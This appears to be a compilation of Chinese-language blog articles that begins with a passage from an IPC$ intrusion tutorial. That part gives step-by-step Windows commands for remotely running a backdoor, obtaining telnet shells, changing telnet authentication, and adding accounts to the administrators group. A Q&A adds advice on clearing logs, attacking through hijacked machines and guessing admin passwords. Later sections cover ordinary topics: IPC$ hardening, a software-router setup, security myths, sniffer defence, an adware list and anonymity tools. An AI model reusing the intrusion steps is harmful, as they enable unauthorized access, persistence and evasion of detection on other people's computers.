\用at命令远程运行srv.exe,需要对方开启了‘Task Scheduler‘服务  

[6]
C:>net time \127.0.0.1
\再次查看当前时间来估算srv.exe是否已经运行,此步可以省略

[7]    
C:>telnet 127.0.0.1 99
\开一个新窗口,用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么意思?那你就把它想象成远程机器的控制权就好了,操作像DOS),99端口是srv.exe开的一次性后门的端口  

[8]
C:WINNTsystem32>net start telnet
\我们在刚刚登陆上的shell中启动远程机器的telnet服务,毕竟srv.exe是一次性的后门,我们需要一个长久的后门便于以后访问,如果对方的telnet已经启动,此步可省略

[9]
C:>copy ntlm.exe \127.0.0.1admin$system32
\在原来那个窗口中将ntlm.exe传过去,ntlm.exe是用来更改telnet身份验证的  

[10]
C:WINNTsystem32>ntlm.exe
\在shell窗口中运行ntlm.exe,以后你就可以畅通无阻的telnet这台主机了
  
[11]
C:>telnet 127.0.0.1 23
\在新窗口中telnet到127.0.0.1,端口23可省略,这样我们又获得一个长期的后门

[12]
C:WINNTsystem32>net user 帐户名 密码 /add
C:WINNTsystem32>net uesr guest /active:yes
C:WINNTsystem32>net localgroup administrators 帐户名 /add
\telnet上以后,你可以建立新帐户,激活guest,把任何帐户加入管理员组等

好了,写到这里我似乎回到了2,3年前,那时的ipc$大家都是这么用的,不过随着新工具的出现,上面提到的一些工具和命令现在已经不常用到了,那就让我们看看现在的高效而简单的ipc$入侵吧。

[1]
psexec.exe \IP -u 管理员帐号 -p 密码 cmd
\用这个工具我们可以一步到位的获得shell

OpenTelnet.exe \server 管理员帐号 密码 NTLM的认证方式 port
\用它可以方便的更改telnet的验证方式和端口,方便我们登陆

[2]
已经没有第二步了,用一步获得shell之后,你做什么都可以了,安后门可以用winshell,克隆就用ca吧,开终端用3389.vbe,记录密码用win2kpass,总之好的工具不少,随你选了,我就不多说了。

十四 如何防范ipc$入侵察看本地共享资源
运行-cmd-输入net share
删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)

1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)

运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous = DWORD的键值改为:1
如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但无法通过这种连接得到列举SAM帐号和共享信息的权限;在Windows 2000 中增加了"2",未取得匿名权的用户将不能进行ipc$空连接。建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。如果你觉得改注册表麻烦,可以在本地安全设置中设置此项: 在本地安全设置-本地策略-安全选项-‘对匿名连接的额外限制‘

2 禁止默认共享

1)察看本地共享资源
运行-cmd-输入net share

2)删除共享(重起后默认共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)

3)停止server服务
net stop server /y (重新启动后server服务会重新开启)

4)禁止自动打开默认共享(此操作并不能关闭ipc$共享)
运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesLanmanServerParameters]把AutoShareServer (DWORD)的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加,修改后重起机器使设置生效。

3 关闭ipc$和默认共享依赖的服务:server服务
如果你真的想关闭ipc$共享,那就禁止server服务吧:
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用,这时可能会有提示说:XXX服务也会关闭是否继续,因为还有些次要的服务要依赖于server服务,不要管它。

4 屏蔽139,445端口
由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻止ipc$入侵。

1)139端口可以通过禁止NBT来屏蔽
本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’一项

2)445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: SystemControlsetServicesNetBTParameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完后重启机器
注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。

3)安装防火墙进行端口过滤

6 设置复杂密码,防止通过ipc$穷举出密码,我觉得这才是最好的办法,增强安全意识,比不停的打补丁要安全的多。

十五 ipc$入侵问答精选
1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?

答:留下记录是一定的,你走后用清除日志程序删除就可以了,或者用肉鸡入侵。

2.你看下面的情况是为什么,可以连接但不能复制
net use \***.***.***.***ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe \***.***.***.***admin$
找不到网络路径
命令不成功

答:像“找不到网络路径”“找不到网络名”之类的问题,大多是因为你想要复制到的共享文件夹没有开启,所以在复制的时候会出现错误,你可以试着找找其他的共享文件夹。

3.如果对方开了IPC$,且能建立空联接,但打开C、D盘时,都要求密码,我知道是空连接没有太多的权限,但没别的办法了吗?

答:建议先用流光或者别的什么扫描软件试着猜解一下密码,如果猜不出来,只能放弃,毕竟空连接的能力有限。

4.我已经猜解到了管理员的密码,且已经ipc$连接成功了,但net view \ip发现它没开默认共享,我该怎么办?

答:首先纠正你的一个错误,用net view \ip是无法看到默认共享的,你可以试着将文件复制到c$,d$看看,如果都不行,说明他关闭了默认共享,那你就用opentelnet.exe或psexec.exe吧,用法上面有。

5.ipc$连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己的机器上,这是怎么回事?
net uset ccbirds /add

答:ipc$建立成功只能说明你与远程主机建立了通信隧道,并不意味你取得了一个shell,只有在获得一个shell(比如telnet)之后,你才能在远程机器建立一个帐户,否则你的操作只是在本地进行。

6.我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序到他的机子上却不行,每次都提示“拒绝访问,已复制0个文件”,是不是对方有什么服务没开,我该怎么办?

答:一般来说“拒绝访问”都是权限不够的结果,可能是你用的帐户有问题,还有一种可能,如果你想向普通共享文件夹复制文件却返回这个错误,说明这个文件夹设置的允许访问用户中不包括你(哪怕你是管理员),这一点我在上一期文章中分析了。

7.我用Win98能与对方建立ipc$连接吗?

答:理论上不可以,要进行ipc$的操作,建议用win2000,用其他操作系统会带来许多不必要的麻烦。

8.我用net use \ipipc$ "" /user ""成功的建立了一个空会话,但用nbtstat -A IP 却无法导出用户列表,这是为什么?

答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁止导出列表,就会出现你所说的情况;还有可能是你自己的NBT没有打开,netstat命令是建立在NBT之上的。  

9.我建立ipc$连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲突’,怎么回事?

答:呵呵,这说明你已经与目标主机建立了ipc$连接,两个主机间同时建立两个ipc$连接是不允许的。

10.我在映射的时候出现:
F:>net use h: \211.161.134.*e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事?

答:你也太粗心了吧,这说明你有一个h盘了,映射到没有的盘符吧!

11.我建立了一个连接f:>net use \*.*.*.*ipc$ "123" /user:"guest" 成功了,但当我映射时出现了错误,向我要密码,怎么回事?
F:>net use h: \*.*.*.*c$
密码在 \*.*.*.*c$ 无效。
请键入 \*.*.*.*c$ 的密码:
系统发生 5 错误。
拒绝访问。

答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射C$这个默认共享,想办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权限的。

12.我用superscan扫到了一个开了139端口的主机,但为什么不能空连接呢?

答:你混淆了ipc$与139的关系,能进行ipc$连接的主机一定开了139或445端口,但开这两个端口的主机可不一定能空连接,因为对方可以关闭ipc$共享.

13.我门局域网里的机器大多都是xp,我用流光扫描到几个administrator帐号口令是空,而且可以连接,但不能复制东西,说错误5。请问为什么?

答:xp的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来宾权限,因此你复制文件,当然是错误5:权限不够。

14.我用net use \192.168.0.2ipc$ "password" /user:"administrator" 成功,可是 net use i: \192.168.0.2c
出现请键入 \192.168.0.2 的密码,怎么回事情呢?我用的可是管理员呀?应该什么都可以访问呀?

答:虽然你具有管理员权限,但管理员在设置c盘共享权限时(注意:普通共享可以设置访问权限,而默认共享则不能)可能并未设置允许administrator访问,所以会出现上述问题。

15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器?如果禁止server服务呢?

答:禁止以上两项仍可以发起ipc$连接,不过这种问题自己动手试验会更好。

16.能告诉我下面的两个错误产生的原因吗?
c:>net time \61.225.*.*
系统发生 5 错误。
拒绝访问。

c:>net view \61.225.*.*
系统发生 5 错误。
拒绝访问。

答:起初遇到这个问题的时候我也很纳闷,错误5表示权限不够,可是连空会话的权限都可以完成上面的两个命令,他为什么不行呢?难道是他没建立连接?后来那个粗心的同志告诉我的确是这样,他忘记了自己已经删了ipc$连接,之后他又输入了上面那两个命令,随之发生了错误5。

17.您看看这是怎么回事?
F:>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。

答:答案很简单,你的命令错了,应该是net time \ip
没输入ip地址,当然找不到服务器。view的命令也应该有ip地址,即:net view \ip

Ref: http://blog.csdn.net/suya/archive/2006/04/09/656566.aspx

当一个局域网中存在两个以上网段时,分属于不同网段内的主机彼此互不可见。为了解决这个问题,就必须在不同的网段之间设置路由器。如果花费上万元资金购买一台路由器,仅仅用于连接局域网中的两个网段,实在不值得。其实我们完全可以利用 Windows 2000中的软路由:

  软路由安装前的准备: 

  1、在欲设置为软路由的计算机中安装Windows 2000 Server。 

  2、在欲设置为软路由的计算机中安装两块网卡。 

  3、在欲设置为软路由的计算机中安装TCP/IP协议,并为两块网卡分别配置IP地址信息(例如,192.168.1.1/255.255.255.0和10.0.0.1/255.0.0.0),使两块网卡分别处于两个不同的IP网段。 

  软路由的安装步骤: 

  以域用户管理员的身份登录,并执行下述操作。 

  1、依次单击“开始/程序/管理工具/路由和远程访问”,打开“路由和远程访问”窗口。 

  2、单击“操作”菜单,选择“配置并启用路由和远程访问”命令,运行“路由和远程访问服务器安装向导”,单击[下一步]。  

  3、由于在这里要安装的是路由器,所以,选择“网络路由器”选项,并单击[下一步]。 

  4、通常情况下,局域网计算机中只安装TCP/IP协议和NetBEUI协议,而且只有TCP/IP协议拥有路由功能。AppleTalk协议仅用于苹果计算机之间的通讯。由于TCP/IP协议已经显示于“协议”列表之中,因此,选择“是,所有可用的协议都在列表上”选项,并单击[下一步]。 

  5、本例中不安装远程访问服务,因此,选择“否”,不使用请求拨号访问远程网络。单击[下一步]。

  6、完成“路由和远程访问服务器安装向导”,单击[完成]。 

  软路由的设置: 

  1、依次单击“开始/程序/管理工具/路由和远程访问”,打开“路由和远程访问”窗口。 

  2、右键单击要启用路由的服务器名,然后单击“属性”,显示“属性”对话框。 

  3、在“常规”选项卡上,选中“路由器”复选框,并选择“仅用于局域网(LAN)路由选择”选项,单击[确定]。

  4、在“路由和远程访问”窗口中,打开左侧目录树“IP路由选择”,右击“常规”,并在快捷菜单中选择“新路由选择协议”,显示“新路由选择协议”对话框。

  5、在“路由选择协议”列表中选中“用于Internet协议的RIP版本2”,并单击[确定]。注意,在中小型网络中建议选择RIP协议,在大型网络中则选择OSPF协议。 

  6、在目录树中右击“RIP”,并在快捷菜单中选择“新接口”,显示“用于Internet协议的RIP版本2的新接口”对话框。 

  7、在“接口”列表框中选择第一个网络接口,即“本地连接”,单击[确定],显示“RIP属性”对话框。 

  8、RIP属性取系统默认值即可,单击[确定]。 

  9、重复以上6至8操作,为RIP添加第二个网络接口,即“本地连接2”。 

  客户端的配置 

  若欲实现192.168.1.0和10.0.0.0两个IP地址段中计算机之间的互访,在安装并设置好IP路由后,还必须对客户机做相应的设置。对于 192.168.1.0地址段中的计算机,需将其默认网关设置为192.168.1.1,而对于10.0.0.0地址段中的计算机,则需将其默认网关设置为10.0.0.1。 

  设置方法如下:  

  1、依次打开“开始/控制面板/网络”,打开“网络”对话框。 

  2、在“配置”选项卡的“已经安装了下列网络组件”列表中,选择“TCP/IP”中已列出的设备,单击[属性]按钮,显示“TCP/IP属性”对话框。 

  3、选择“网关”选项卡,在“新网关”对话框中键入“192.168.1.1”(假如IP地址位于192.168.1.0~192.168.1.255 之间)或“10.0.0.1”(假如IP地址位于10.0.0.0~10..255.255.255之间),单击[添加]。 

  4、单击[确定],完成网关设置,并根据系统提示重新启动计算机。

近日,也不知怎么了,单位网络中的许多工作站IE无法打开新窗口了,表现为:在浏览网页过程中,单击超链接无任何反应。问题的原因在于IE新窗口模块被损坏所致,解决的方法早已是公开的秘密,单击“运行”,依次运行“regsvr32 actxprxy.dll”和“regsvr32  shdocvw.dll”将这两个DLL文件注册,然后重启系统,如果还不行,则可以将mshtml.dll,urlmon.dll, msjava.dll, browseui.dll, oleaut32.dll , shell32.dll 也注册一下,一般即可解决。这本没有什么好说的,但是如果一台台来注册相关的DLL控件,工作量十分大,突发奇想,能不能将注册/反注册DLL控件的命令添加右键菜单中去呢?一试竟然成功,现整理出来,与朋友共同探讨:

  第一步:打开记事本程序,录入以下内容:

  Windows Registry Editor Version 5.00  

  [HKEY_CLASSES_ROOTdllfileshell]

  [HKEY_CLASSES_ROOTdllfileshell注册]

  [HKEY_CLASSES_ROOTdllfileshell注册command]

  @="regsvr32 %1"

  [HKEY_CLASSES_ROOTdllfileshell反注册]

  "Command"="regsvr32 %1 /u"

  [HKEY_CLASSES_ROOTdllfileshell反注册command]

  @="regsvr32 %1 /u"

  录入完毕,末尾空一行以上空格,或回一下车,另存为“REGDLL.REG”,文件名任取,后缀名必须是“REG”。

  第二步:通过网上邻居将该文件共享出去,让各工作站下载该文件。

  第三步:双击“REGDLL.REG”文件,将其导入到注册表中去。

  

  好了,现在随便找一个DLL文件试试,在其上点右键,在右键菜单中就会出现“注册/反注册”的选项(如图所示)。这样,我们就可以通过选取相应的选项来注册/反注册选项的DLL文件了,十分的方便!

  许多人对于自己的数据和网络目前有一种虚假的安全感;在边界安装了防火墙、在桌面上安装了防病毒和防间谍软件工具、使用加密技术发送和保存数据;此外,微软及各大安全公司不断增强安全工具和补丁程序……似乎可以松口气了,但果真如此吗?

  以下是有关安全的七大误解,不妨看看你的数据是否有你想象中的那么安全。

  误解一:加密确保了数据得到保护

  对数据进行加密是保护数据的一个重要环节,但不是绝无差错。Jon Orbeton警告说:如今黑客采用嗅探器可是越来越完善,能够截获SSL和SSL交易信号,窃取经过加密的数据。虽然加密有助于保护遭到窃取的数据被人读取,但加密标准却存在着几个漏洞。黑客只要拥有适当工具,就能够钻这些漏洞的空子。Orbeton说:"黑客在想方设法避开安全机制。"

  误解二:防火墙会让系统固若金汤

  SteveThornburg是开发半导体联网解决方案的Mindspeed科技公司的工程师,他说:"许多人说:‘我们装有防火墙。‘但防火墙功能再好,经过它们的IP数据痕迹照样能够被读取。"黑客只要跟踪内含系统网络地址的IP痕迹,就能了解服务器及与它们相连的计算机的详细信息,然后利用这些信息钻网络漏洞的空子。

  如此看来,仅有防火墙和加密显然不够。网络管理员不仅要确保自己运行的软件版本最新、最安全,还要时时关注操作系统的漏洞报告,时时密切关注网络,寻找可疑活动的迹象。此外,他们还要对使用网络的最终用户给出明确的指导,劝他们不要安装没有经过测试的新软件,打开电子邮件的可执行附件,访问文件共享站点、运行对等软件,配置自己的远程访问程序和不安全的无线接入点,等等。

  Thornburg说,问题在于,愿意投入财力和人力来保持安全的公司寥寥无几。他说:"它们知道这么做不会受欢迎,因为这会降低工作效率。成本是主要的问题,因为这些公司都关注成本底线。"

  误解三:黑客不理睬老的软件

  一些人认为,如果运行老的系统,就不会成为黑客的攻击目标,因为黑客只盯住使用较为广泛的软件,而这些软件的版本要比我们自己正在用的来得新。

  事实并非如此,Johannes Ullrich说。他是安全分析和预警服务机构——SANS因特网风暴中心的首席技术官,这家机构负责发布有关安全漏洞和错误的警告。他提醒,对黑客来说,最近没有更新或者没有打上补丁的Web服务器是一个常见的攻击点。"许多旧版本的Apache和IIS(因特网信息服务器)会遭到缓冲器溢出攻击。"

  如果存储空间处理不了太多信息,就会出现溢出,从而会发生缓冲器溢出问题。额外信息总会溢出到某个地方,这样黑客就可以利用系统的漏洞,让额外信息进入本不该进入的地方。虽然微软和Apache.org在几年前都发布了解决缓冲器溢出问题的补丁,但还有许多旧系统没打上补丁。

  误解四:Mac机很安全

  许多人还认为,自己的Mac系统跟老系统一样,也不容易遭到黑客的攻击。但是,许多Mac机运行微软Office等Windows程序,或者与 Windows机器联网。这样一来,Mac机同样难免遇到Windows用户面临的漏洞。正如安全专家Cigital公司的CTO Gary McGraw所说:出现针对Win32和OS X的跨平台病毒"只是迟早的事"。

  Mac OS X环境也容易受到攻击,即便不是在运行Windows软件。赛门铁克公司最近发布的一份报告发现,2004年查明Mac OS X存在37种漏洞。该公司警告,这类漏洞可能会日渐成为黑客的目标,特别是因为Mac系统开始日渐流行。譬如在2004年10月,黑客编写了名为 Opener的一款脚本病毒。该脚本可以让Mac OS X防火墙失效、获取个人信息和口令、开后门以便可以远程控制Mac机,此外还可能会删除数据。

  误解五:安全工具和软件补丁让每个人更安全

  有些工具可以让黑客对微软通过其Windows update服务发布的补丁进行"逆向工程"(reverse-engineer)。通过比较补丁出现的变化,黑客就能摸清补丁是如何解决某个漏洞的,然后查明怎样利用补丁。

  Marty Lindner是卡内基梅隆大学软件工程研究所计算机紧急响应小组协调中心的事件处理小组负责人,他说:"如今开发的新工具都围绕同一个基本主题:扫描寻找漏洞。对因特网进行扫描,详细列出易受攻击的机器。所开发的工具假定每台机器都容易遭到某个漏洞的攻击,然后只需运行工具就是了。每个系统都有漏洞;没有什么是百分之百安全的。"

  黑客普遍使用的工具当中就有Google,它能够搜索并找到诸多网站的漏洞,譬如默认状态下的服务器登录页面。有人利用Google寻找不安全的网络摄像头、网络漏洞评估报告、口令、信用卡账户及其他敏感信息。Santy蠕虫和MyDoom的新变种最近就利用了Google的黑客功能(Google hacking)。甚至已经开始涌现出了Johnny.IHackStuff.com这样的网站,它们提供链接到介绍越来越多的Google黑客手法的地方。

  今年早些时候,McAfee公司发布了SiteDigger 2.0工具的更新版,它有一些新特性,譬如可以查明某个站点是不是容易受到Google黑客攻击。虽然这款工具的目的是供管理员测试各自的网络,但黑客也有可能利用该软件寻找任何站点存在的漏洞。

  误解六:只要企业网络的安全没有被突破,黑客就奈何不了你

  有些IT部门拼命防护企业网络,却不料因为用户把公司的便携式电脑接到家里或者Wi-Fi热点地区等未受保护的网络连接,结果企业网安全遭到危及。黑客甚至可以在热点地区附近未授权的Wi-Fi接入点,诱骗用户登录到网络。一旦恶意用户控制了某台计算机,就可以植入击键记录程序,窃取企业VPN软件的口令,然后利用窃取的口令随意访问网络。

  有时候,单单恐吓要搞破坏也会迫使公司就范,黑客甚至扬言要破坏网站、删除重要文件,或者把幼儿色情图片放到公司计算机上,从而对受害者进行敲诈。这已有过先例,据说,因黑客扬言要发动拒绝服务攻击敲诈钱财,英国有许多网上赌博站点一直在出钱消灾。

  误解七:如果你为安全公司工作,数据就安然无恙

  连据认为最安全的组织也有可能发现自己容易受到黑客的攻击。位于弗吉尼亚州费尔法克斯的乔治梅森大学是安全信息系统中心的所在地,向来不乏安全专家。但这个工作场所最近发现,黑客攻击了这所大学的主ID服务器、往服务器中安装了搜寻其他大学的系统的工具后,32000多名学生和教职员工的姓名、社会保障号码以及照片在黑客面前暴露无遗。黑客可能通过没有防火墙保护的计算机潜入进来,然后植入了扫描工具,寻找闯入其他系统的口令。

  这家大学立即采取了对策,关闭了服务器中的部分系统,用不同的ID号取代了学生们的社会保障号码,防范身份失窃。校方还在允许计算机连接到其网络之前,先使用软件进行扫描;建立较小的子网,隔离存放有敏感数据的计算机;更加密切地监控整个网络的活动。

  连一些国家的国防部门也不能幸免。它们只好不断部署新软件以防范新出现的漏洞,并且坚持采用经过实践证明可靠的安全方法。譬如说,加拿大国防部就使用 Vanguard Integrity Professionals公司的Vanguard Security Solutions 5.3,保护所用的IBM eServer zSeries大型机。这款软件包括采用双令牌的用户验证机制,可以同IBM用于z/OS的资源访问控制工具(RACF)配合使用。

  加拿大国防部的RACF中心管理员George Mitchell说,他总是保持高度警惕,以防未授权用户获得访问系统的机会。除了使用监控工具外,他还要运用常识。"我会让某人打电话告诉大致情况。如果某人想更改口令,我会问几个问题,通过加密的电子邮件对该人进行答复。"

  归根结蒂是需要始终保持谨慎。前不久,社会名流帕丽斯希尔顿(Paris Hilton)储存在T-Mobile Sidekick手机的资料被黑客公布到网上;ChoicePoint和LexisNexis两家公司为顾客保存的机密的信用信号被人窃取,这些事件表明,黑客采用的伎俩越来越五花八门。黑客在利用不断增多的漏洞时,手法越来越新奇,所以我们的任务就是随时关注最新工具和技巧,采取相应的措施自我保护。

  原文地址:http://hacker57.it.com.cn/articles/107791.htm

1、怎样发现 Sniffer

  Sniffer最大的危险性就是它很难被发现,在单机情况下发现一个Sniffer还是比较容易的,可以通过查看计算机上当前正在运行的所有程序来实现,当然这不一定可靠。

  在UNIX系统下可以使用下面的命令:ps-aux。这个命令列出当前的所有进程、启动这些进程的用户、它们占用CPU的时间以及占用多少内存等等。在Windoos系统下,可以按下Ctrl+Alt+Del键,查看任务列表。不过,编程技巧高的Sniffer即使正在运行,也不会出现在这里。

  另一个方法就是在系统中搜索,查找可怀疑的文件。但人侵者用的可能是他们自己写的程序,所以这给发现Sniffer造成相当大的困难。还有许多工具能用来查看你的系统会不会处于混杂模式,从而发现是否有一个Sniffer正在运行。但在网络情况下要检测出哪一台主机正在运行Sniffer是非常困难的,因为Sniffer是一种被动攻击软件,它并不对任何主机发出数据包,而只是静静地运行着,等待着要捕获的数据包经过。

  2、抵御 Sniffer

  虽然发现一个Sniffer是非常困难的,但是我们仍然有办法抵御Sniffer的嗅探攻击。既然Sniffer要捕获我们的机密信息,那我们干脆就让它捕获,但事先要对这些信息进行加密,黑客即使捕捉到了我们的机密信息,也无法解密,这样,Sniffer就失去了作用。

  黑客主要用Sniffer来捕获Telnet、FTP、POP3等数据包,因为这些协议以明文在网上传输,我们可以使用一种叫做SSH的安全协议来替代Telnet等容易被Sniffer攻击的协议。

  SSH又叫Secure Shell,它是一个在应用程序中提供安全通信的协议,建立在客户/服务器模型上。SSH服务器分配的端口是22,连接是通过使用一种来自RSA的算法建立的。在授权完成后,接下来的通信数据用IDEA技术来加密。这种加密方法通常是比较强的,适合于任何非秘密和非经典的通信。

  SSH后来发展成为F-SSH,提供了高层次的、军方级别的对通信过程的加密。它为通过TCP/IP的网络通信提供了通用的最强的加密。如果某个站点使用F—SSH,用户名和口令就不再重要了。目前,还没有人突破过这种加密方法。即使是Sniffer,收集到的信息将不再有价值。有兴趣的读者可以参看与SSH相关的书籍。

  另一种抵御Sniffer攻击的方法是使用安全的拓扑结构。因为Sniffer只对以太网、令牌环网等网络起作用,所以尽量使用交换设备的网络可以从最大程度上防止被Sniffer窃听到不属于自己的数据包。还有一个原则用于防止Snther的被动攻击一个网络段必须有足够的理由才能信任另一网络段。网络段应该从考虑具体的数据之间的信任关系上来设计,而不是从硬件需要上设计。一个网络段仅由能互相信任的计算机组成。通常它们在同一个房间里,或在同一个办公室里,应该固定在建筑的某一部分。注意每台机器是通过硬连接线接到集线器(Hub)的,集线器再接到交换机上。由于网络分段了,数据包只能在这个网段上被捕获,其余的网段将不可能被监听。

  所有的问题都归结到信任上面。计算机为了和其他计算机进行通信,它就必须信任那台计算机。系统管理员的工作就是决定一个方法,使得计算机之间的信任关系很小。这样,就建立了一种框架,告诉你什么时候放置了一个Sniffer,它放在哪里,是谁放的等等。

  如果局域网要和Internet相连,仅仅使用防火墙是不够的。人侵者已经能从一个防火墙后面扫描,并探测正在运行的服务。应该关心的是一旦人侵者进人系统,他能得到些什么。你必须考虑一条这样的路径,即信任关系有多长。举个例子,假设你的Web服务器对计算机A是信任的,那么有多少计算机是A 信任的呢?又有多少计算机是受这些计算机信任的呢?一句话,就是确定最小信任关系的那台计算机。在信任关系中,这台计算机之前的任何一台计算机都可能对你的计算机进行攻击并成功。你的任务就是保证一旦出现Sniffer,它只对最小范围有效。

  Sniffr往往是在攻击者侵人系统后使用的,用来收集有用的信息。因此,防止系统被突破很关键。系统安全管理员要定期的对所管理的网络进行安全测试,防止安全隐患。同时要控制拥有相当权限的用户的数量,因为许多攻击往往来自网络内部。

  3、防止 Sniffer的工具 Antisnff

  Antisniff是由著名黑客组织(现在是安全公司了)L0pht开发的工具,用于检测本地网络是否有机器处于混杂模式(即监听模式)。

  一台处于混杂模式的机器意味着它很可能已被入侵并被安装了Sniffer。对于网络管理员来说,了解哪台机器正处于混杂模式以作进一步的调查研究是非常重要的。

  Antisniff 1.X版运行在以太网的WindOWS NT系统中,并提供了简单易用的用户图形界面。该工具以多种方式测试远程系统是否正在捕捉和分析那些并不是发送给它的数据包。这些测试方法与其操作系统本身无关。

  Antisniff运行在本地以太网的一个网段上。如果在非交换式的C类网络中运行,Antisniff能监听整个网络;如果网络交换机按照工作组来隔离,则每个工作组中都需要运行一个Antisniff。原因是某些特殊的测试使用了无效的以太网地址,另外某些测试需要进行混杂模式下的统计(如响应时间、包丢失率等)。

  Antisniff的用法非常简便,在工具的图形界面中选择需要进行检查的机器,并且指定检查频率。对于除网络响应时间检查外的测试,每一台机器会返回一个确定的正值或负值。返回的正值表示该机器正处于混杂模式,这就有可能已经被安装了Sniffer。

  对于网络响应时间测试的返回值,建议根据第一次返回的数值计算标准值,然后再对在flood和非flood两次测试时返回的结果有较大变化的机器进行检查。一旦这些机器退出混杂模式返回到正常操作模式下,Antisniff的下一次测试将会记录到混杂模式和非混杂模式的差值(正值)。

  应该周期性地运行Antisniff,具体周期值根据不同的站点、不同的网络负荷、测试的机器数量和网站策略等而有所不同。

最近,ChinaBytes列出了一个中国流氓插件排行榜,包含了130个不完全名单。大家看看,如果电脑里面有下列软件的话,最好卸载掉吧。

1. 网络猪
2. 完美网译通
3. CNNIC中文上网
4. 博采网摘
5. 百度搜霸
6. 3721上网助手
7. Dudu下载加速器
8. 很棒小秘书
9. 一搜工具条
10. 划词搜索
11. eBay工具条
12. 娱乐心空
13. Yahoo助手(原3721)
14. 搜狗
15. 彩信通
16.360搜
17.多多QQ表情
18.易趣工具栏
19.很棒通行证
20.搜易网弹出广告
21.天下搜
22.U88财富快车工具条
23.唯刊
24.完美网译通
25.协和医院弹出广告
26.YOK工具条
27.桌面传媒(Desktop media)
28.酷站导航
29.中网媒体速递
30.DIY彩秀
31.电鹰搜索
32.SearchNet(中搜地址栏搜索)
33.New.net
34.Xbar 图铃随e下
35.win survey (MSIBM)
36.ZCOM
37.搜搜工具条(SOSO)
38.ShareHelper
39.播霸猫眼网络电视迷你版
40.天天搜索
41.SeAD/DmAD
42.酷客娱乐平台
43.Bysoo百搜工具栏
44.Infofo工具栏
45.ishare
46.酷猴
47.MSser
48.ZDA WebMisc天网广告软件
49.Win stdup
50.网址极限
51.Copyso 拷贝搜
52.搜狗直通车
53.8848购物搜索
54.IE伴郎
55.51888彩信助手
56.青娱乐
57.虎翼DIY吧
58.迷你PP
59.迷你迅雷
60.Alibaba商机直通车
61.网易搜霸
62.搜一搜
63.17lele网游
64.新浪iGAME游戏总动园
65.新浪点点通
66.miphone小蜜蜂
67.金山产品下载器
68.Ibar
69.DMCast桌面传媒
70.私人磁盘
71.极品数字网络电视
72.NetFish网络钓鱼克星
73.T2BHO
74.开心运程速递插件
75.Xplus
76.ADDeliverer
77.TargetAD
78.DTservice
79.EliteBar
80.ADO
81.EyeOnIE class
82.Router layer
83.InsII
84.Hotbar
85.Netbus Toolbar
86.31G上网直通车
87.139LOVE
88.Urlcom
89.Sol099
90.wz101
91.ADNavihepler(女生宿舍)
92.自由行中文域名
93.赢政天下网摘
94.易搜搜索引擎
95.迅彩图铃通
96.新浪VIVI收藏夹
97.新华快信
98.网游天使自助远程挂机平台
99.网易SMS Ppinstall Control
100.网眼天下WebEye
101.同花顺工具条
102.天天在线.黑龙江PortalCom Control2.0
103.腾讯极速下载控件
104.闪电搜霸Flashbar
105.塞我网CyworldChina
106.亲亲娱乐伴侣
107.每步直达网址
108.空中网彩信通
109.九寻音乐 音乐搜索伴侣软件1.0.0.3
110.金山安全助手
111.金盒子MultiUpload
112.广东互联星空CertInstall Control
113.恶意网站克星 木马间谍克星
114.初收获工具条
115.藏鲸阁
116.百易汉字域名
117.百度搜索伴侣
118.百度超级搜霸
119.爱美思中文邮址
120.阿里巴巴智能搜索
121.Yoday
122.xintv.com Timer Object
123.Kincent Q.Audio Control Class
124.K65.net组件
127.HarrySou ToolBar
128.EPSON Web Printer-SelfTest Control Class
129.ClockSync
130.668企业通道工具栏

来源:ChinaByte

1.匿名隐私

Permeo Security Driver v4.22 2468K 网络隐身代理极佳软件
将本地应用程序的网络连接请求直接转化为socks5,可以调度使用Socks 5和跳板服务器等功能。
网上有几种版,但4.2.6版本太大。参考下载(http://www.top183.cn/soft/3535.htm)

GhostSurf 2.1 3074 KB 通过因特网的匿名的"hub"发送数据,使追踪你成为不可能。
主页:http://www.tenebril.com/products/ghostsurf

Stealth Anonymizer v2.7 允许你掩饰身份访问、拦阻cookies、修改任何有关你的网络浏览器发出的计算机的信息。浏览访问时为每个页自动改变代理使之保证最大的安全。批量检查每个代理服务器其响应时间、验证其匿名性等。
下载页面(http://www.ttdown.com/SoftView/SoftView_15911.html)

JavaAnonProxy v00.02.004 1.1MB JAP用于保护互联网访问隐私的工具,比一般的代理服务器具有更高的安全性。下载版本java有关。
主页:http://anon.inf.tu-dresden.de/index_en.html
主页下载(windows)(http://anon.inf.tu-dresden.de/win/jap_all/japsetup.exe)

